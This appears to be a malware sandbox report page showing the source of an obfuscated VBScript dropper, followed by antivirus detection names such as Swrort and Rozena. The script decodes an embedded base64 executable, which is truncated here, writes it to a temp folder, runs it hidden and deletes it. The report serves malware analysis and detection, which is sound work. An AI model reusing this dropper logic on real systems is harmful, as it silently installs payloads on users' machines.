Static | ZeroBOX
No static analysis available.
Function rvZxBgAzoIkkKH(BGryeZMiEYJKI)
LnZTXYietPcg = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
BGryeZMiEYJKI & "</B64DECODE>"
Set XWhCHDfCdxZr = CreateObject("MSXML2.DOMDocument.3.0")
XWhCHDfCdxZr.LoadXML(LnZTXYietPcg)
rvZxBgAzoIkkKH = XWhCHDfCdxZr.selectsinglenode("B64DECODE").nodeTypedValue
set XWhCHDfCdxZr = nothing
End Function
Function lRxNGlJvOirYw()
BWjxRdBcvU = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAF8gSBoAAAAAAAAAAOAADwMLAQI4AAIAAAAOAAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABAAAAAAgAARjoAAAIAAAAAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAwAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAKAAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAMGAuZGF0YQAAAJAKAAAAIAAAAAwAAAAEAAAAAAAAAAAAAAAAAAAgADDgLmlkYXRhAABkAAAAADAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAwwAAAAAAAAAAAAAAAAAAAAAC4ACBAAP/gkP8lODBAAJCQAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Dim hyKmrRASehB
Set hyKmrRASehB = CreateObject("Scripting.FileSystemObject")
Dim YlZZcWpBjMXOr
Dim hFmmXUZNzdE
Set YlZZcWpBjMXOr = hyKmrRASehB.GetSpecialFolder(2)
hFmmXUZNzdE = YlZZcWpBjMXOr & "\" & hyKmrRASehB.GetTempName()
hyKmrRASehB.CreateFolder(hFmmXUZNzdE)
btcseejVGdV = hFmmXUZNzdE & "\" & "hTSebfAkRTedaXH.exe"
Dim zIHlysiV
Set zIHlysiV = CreateObject("Wscript.Shell")
BUXuNlZZaCxqNC = rvZxBgAzoIkkKH(BWjxRdBcvU)
Set WzmJChNVPwU = CreateObject("ADODB.Stream")
WzmJChNVPwU.Type = 1
WzmJChNVPwU.Open
WzmJChNVPwU.Write BUXuNlZZaCxqNC
WzmJChNVPwU.SaveToFile btcseejVGdV, 2
zIHlysiV.run btcseejVGdV, 0, true
hyKmrRASehB.DeleteFile(btcseejVGdV)
hyKmrRASehB.DeleteFolder(hFmmXUZNzdE)
End Function
lRxNGlJvOirYw
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Swrort.4!c
tehtris Clean
MicroWorld-eScan VB:Trojan.VBS.Dropper.AG
CTX vba.trojan.swrort
CAT-QuickHeal Trojan.VBS.33100
Skyhigh BehavesLike.VBS.Dropper.zp
ALYac VB:Trojan.VBS.Dropper.AG
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu JS.Trojan-Downloader.Agent.xk
VirIT Clean
Symantec VBS.Heur.SNIC
ESET-NOD32 Win32/Rozena.ED
TrendMicro-HouseCall Backdoor.VBS.SWRORT.YXEKPZ
Avast BV:Dowloader-A [Trj]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender VB:Trojan.VBS.Dropper.AG
NANO-Antivirus Trojan.Script.Agent.fosjzx
ViRobot Clean
Tencent Win32.Trojan.Expkit.Ymhl
Sophos Troj/Swrort-AL
F-Secure Malware.HTML/ExpKit.Gen2
DrWeb JS.Muldrop.457
VIPRE VB:Trojan.VBS.Dropper.AG
TrendMicro Backdoor.VBS.SWRORT.YXEKPZ
CMC Clean
Emsisoft VB:Trojan.VBS.Dropper.AG (B)
huorong TrojanDropper/Agent.fg
FireEye VB:Trojan.VBS.Dropper.AG
Jiangmin Clean
Varist VBS/Agent.AJU!Eldorado
Avira HTML/ExpKit.Gen2
Fortinet VBS/Rozena.ED!tr
Antiy-AVL Clean
Kingsoft Script.Ks.Malware.9344
Gridinsoft Trojan.U.Gen.tr
Xcitium TrojWare.VBS.TrojanDropper.Agent.NJA@833icd
Arcabit VB:Trojan.VBS.Dropper.AG
SUPERAntiSpyware Clean
Microsoft Trojan:VBS/Obfuse.NFE!MTB
Google Detected
AhnLab-V3 Dropper/VBS.Generic
Acronis Clean
McAfee VBS/MPreter
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Dropper.Ploty!8.EEC8 (TOPIS:E0:JqyfiJ1QMlQ)
Yandex Clean
Ikarus Trojan.Win32.Swrort
GData VB:Trojan.VBS.Dropper.AG
AVG BV:Dowloader-A [Trj]
Panda Clean
alibabacloud Trojan:Win/Rozena.EF
No IRMA results available.